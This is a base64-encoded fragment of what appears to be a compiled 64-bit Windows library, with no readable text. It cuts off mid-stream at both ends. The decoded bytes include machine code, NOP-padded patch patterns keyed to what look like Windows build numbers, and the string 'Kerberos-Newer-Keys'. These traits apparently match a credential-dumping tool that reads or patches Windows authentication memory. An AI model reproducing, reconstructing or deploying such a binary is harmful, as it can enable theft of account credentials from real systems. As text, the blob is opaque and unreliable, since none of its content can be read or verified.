AAAAAAAAAAAAAAAAAAAAAAAAADwIwAAAAAAAAgAAAAAAAAA6GsDgAEAAAAAAAAAAAAAAAAAAAAAAAAA/P///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgkAAAAAAAACAAAAAAAAABIbAOAAQAAAAAAAAAAAAAAAAAAAAAAAAD8////y////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAeAoDgAEAAABgCgOAAQAAAEgKA4ABAAAAOAoDgAEAAAAoCgOAAQAAABgKA4ABAAAACAoDgAEAAAD4CQOAAQAAANAJA4ABAAAAsAkDgAEAAACICQOAAQAAAGAJA4ABAAAAMAkDgAEAAAAQCQOAAQAAAINkJDAARItMJEhIiw0AAACDZCQwAESLTdhIiw0lAgDAg2QkMABIjUXgRItN2EiNFXAXAAAAAAAADQAAAAAAAACgbgOAAQAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAu////xkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsB0AAAAAAAANAAAAAAAAAKBuA4ABAAAAAAAAAAAAAAAAAAAAAAAAADsAAADD////GQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwIwAAAAAAAAwAAAAAAAAAsG4DgAEAAAAAAAAAAAAAAAAAAAAAAAAAPgAAALr///8XAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgmAAAAAAAADAAAAAAAAACwbgOAAQAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAvv///xcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlyYAAAAAAAAQAAAAAAAAAMBuA4ABAAAAAAAAAAAAAAAAAAAAAAAAAD0AAAC3////EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgUQGAAQAAAGxRAYABAAAAM9uLw0iDxCBbwwAAvf///+/////d////6P///yUCAMBIiUQkcEiFwHQKSIvI6AAA6////5DpAACLRwSD+AEPhESL6kGD5QF1RIv6QYPnAXVFi/hEI/oAAJCQkJCQkAAAzg4AAAAAAAAIAAAAAAAAAKhwA4ABAAAAAgAAAAAAAACkcAOAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwFwAAAAAAAAgAAAAAAAAAsHADgAEAAAABAAAAAAAAAK9kA4ABAAAABwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPAjAAAAAAAACAAAAAAAAAC4cAOAAQAAAAEAAAAAAAAAr2QDgAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCUAAAAAAAAGAAAAAAAAAMBwA4ABAAAAAQAAAAAAAACvZAOAAQAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACXJgAAAAAAAAYAAAAAAAAAwHADgAEAAAAGAAAAAAAAAMhwA4ABAAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIuBOAYAADmBPAYAAHUAAAA5hzwGAAAPhDmBPAYAAA+Ex4E8BgAA////f5CQ6wAAAMeHPAYAAP///3+QkIP4An/HgTwGAAD///9/kJCQkAAAKAoAAAAAAAAEAAAAAAAAAJxyA4ABAAAAAgAAAAAAAACscgOAAQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwFwAAAAAAAA0AAAAAAAAAYHIDgAEAAAANAAAAAAAAAIByA4ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALAdAAAAAAAACAAAAAAAAABwcgOAAQAAAAwAAAAAAAAAkHIDgAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgCUAAAAAAAAIAAAAAAAAAHhyA4ABAAAADAAAAAAAAACgcgOAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACA5AKAAQAAAGDkAoABAAAAQOQCgAEAAAAo5AKAAQAAABjkAoABAAAAeI4CgAEAAABA5AKAAQAAAEiB7OAAAAAz2zPAAAAAAABIjWwk+UiB7NAAAAAz2zPASI1sJPlIgezgAAAAM/YAAAAAAAAAAAAAsB0AAAAAAAALAAAAAAAAACh0A4ABAAAAAAAAAAAAAAAAAAAAAAAAAOb///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwIwAAAAAAABAAAAAAAAAAOHQDgAEAAAAAAAAAAAAAAAAAAAAAAAAA6////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgmAAAAAAAADgAAAAAAAABIdAOAAQAAAAAAAAAAAAAAAAAAAAAAAADr////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwB1OmgAAACQkAAAAAAAACgKAAAAAAAABQAAAAAAAABQdQOAAQAAAAIAAAAAAAAAWHUDgAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkLQCgAEAAAB4tAKAAQAAAEi0AoABAAAAKLQCgAEAAAAItAKAAQAAAPCzAoABAAAA2LMCgAEAAAC4swKAAQAAAJCQkJCQkAAAuFYhAABBAAD6BRoB6QAAAEiL14uMJAAA//9MjYwkiAEAAAAAAAAAAEmLSBhIi4QkAAQAAEmNQSDHRCR0WQcaAekAAACp/83//w+FAAAAAACLhCRsAQAAPegDAABzAAAAuFYhAABBAADCBRoB6QAAAEiL14uMJAAA//9MjYwkYAEAAAAAAAAAAEmLSBhIi4QkAAQAAJCQAADHRCR0HAcaAekAAACp/83//w+FAAAAAACLhCSYAQAAPegDAABzAAAAuFYhAABBAACWBRoBSAAAAEiNlCQoAQAASI2MJPgBAADoAAAAAAAAAImEJLAAAACJRCRwO8Z0AABIi0cYSI2MJCAFAADrBAAAx0QkdO0GGgGLAAAAqf/N//8PhQAAAAAARIucJIABAABBgfvoAwAAc/8lAAAAAAAABgAAAAAAAAD4dQOAAQAAAAEAAAAAAAAAUWUDgAEAAAD+////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAB2A4ABAAAAAQAAAAAAAABRZQOAAQAAAPP///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAACHYDgAEAAAAGAAAAAAAAAPB1A4ABAAAA9f///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAAAAAAAAAQdgOAAQAAAAYAAAAAAAAA8HUDgAEAAAD8////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMAAAAAAAAACB2A4ABAAAAAQAAAAAAAABRZQOAAQAAAP7///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAAAAAAAAAMHYDgAEAAAABAAAAAAAAAFFlA4ABAAAA8P///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABwAAAAAAAAA8dgOAAQAAAAYAAAAAAAAA8HUDgAEAAAASAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAAAAAAAAAEh2A4ABAAAAAQAAAAAAAABRZQOAAQAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAWHYDgAEAAAABAAAAAAAAAFFlA4ABAAAA/v///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAAAAAAABgdgOAAQAAAAEAAAAAAAAAUWUDgAEAAADz////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAGh2A4ABAAAABgAAAAAAAADwdQOAAQAAAPX///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAAAAAAAAcHYDgAEAAAAGAAAAAAAAAPB1A4ABAAAA/P///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAAAAAAAACAdgOAAQAAAAEAAAAAAAAAUWUDgAEAAAD+////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAAAAAAJB2A4ABAAAAAQAAAAAAAABRZQOAAQAAAPD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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